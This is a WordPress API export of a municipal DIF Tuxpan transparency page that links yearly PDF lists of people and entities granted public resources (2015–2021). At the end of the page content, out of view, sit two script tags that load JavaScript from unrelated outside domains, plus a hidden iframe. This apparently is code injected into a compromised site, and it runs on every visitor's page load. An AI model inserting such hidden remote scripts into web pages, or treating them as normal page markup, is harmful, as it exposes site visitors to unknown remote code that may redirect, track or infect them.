{"id":3405,"date":"2018-04-11T11:26:12","date_gmt":"2018-04-11T17:26:12","guid":{"rendered":"http:\/\/diftuxpan.com\/web1\/?page_id=3405"},"modified":"2021-08-24T10:20:51","modified_gmt":"2021-08-24T16:20:51","slug":"5-m","status":"publish","type":"page","link":"https:\/\/diftuxpan.com\/web1\/5-m\/","title":{"rendered":"Listado Personas F\u00edsicas o Jur\u00eddicas se les asigne o permita usar recursos p\u00fablicos"},"content":{"rendered":"<h3><span style=\"color: #000000;\">ADMINISTRACI\u00d3N\u00a02015-2018<\/span><\/h3>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/V-M-listado-de-personas-fisicas-o-juridicas-2015.pdf\">listado de personas f\u00edsicas o jur\u00eddicas 2015<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/V-M-listado-de-personas-fisicas-o-juridicas-2016.pdf\">listado de personas f\u00edsicas o jur\u00eddicas 2016<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/V-M-listado-de-personas-fisicas-o-juridicas-2017.pdf\">listado de personas f\u00edsicas o jur\u00eddicas 2017<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/V-M-listado-de-personas-fisicas-o-juridicas-2018-ene-sep.pdf\">listado de personas f\u00edsicas o jur\u00eddicas 2018 Enero -Septiembre<\/a><\/span><\/p>\n<h3><span style=\"color: #000000;\">ADMINISTRACI\u00d3N\u00a02018-2021<\/span><\/h3>\n<h5><span style=\"color: #000000;\">2018\u00a0<\/span><\/h5>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/V-M-listado-de-personas-fisicas-o-juridicas-2018-oct-dic.pdf\">listado de personas f\u00edsicas o jur\u00eddicas Octubre -Diciembre<\/a><\/span><\/p>\n<h5><span style=\"color: #000000;\">2019<\/span><\/h5>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/05\/v-m.pdf\">listado de personas f\u00edsicas o jur\u00eddicas , Enero &#8211; Junio\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/ADMINISTRACI\u00d3N-2018.pdf\">Listado de personas f\u00edsicas o Jur\u00eddicas Julio &#8211; Diciembre<\/a><\/span><\/p>\n<h5><span style=\"color: #000000;\">2020<\/span><\/h5>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/Adm-2018.pdf\">Listado de personas f\u00edsicas o jur\u00eddicas Enero &#8211; Diciembre\u00a0<\/a><\/span><\/p>\n<h5><strong>2021<\/strong><\/h5>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2018\/04\/ene-jun.pdf\">Listado de personas f\u00edsicas o jur\u00eddicas Enero &#8211; Junio\u00a0<\/a><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>ADMINISTRACI\u00d3N\u00a02015-2018 listado de personas f\u00edsicas o jur\u00eddicas 2015 listado de personas f\u00edsicas o jur\u00eddicas 2016 listado de personas f\u00edsicas o jur\u00eddicas 2017 listado de personas f\u00edsicas<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3405"}],"collection":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/comments?post=3405"}],"version-history":[{"count":13,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3405\/revisions"}],"predecessor-version":[{"id":5991,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/3405\/revisions\/5991"}],"wp:attachment":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/media?parent=3405"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}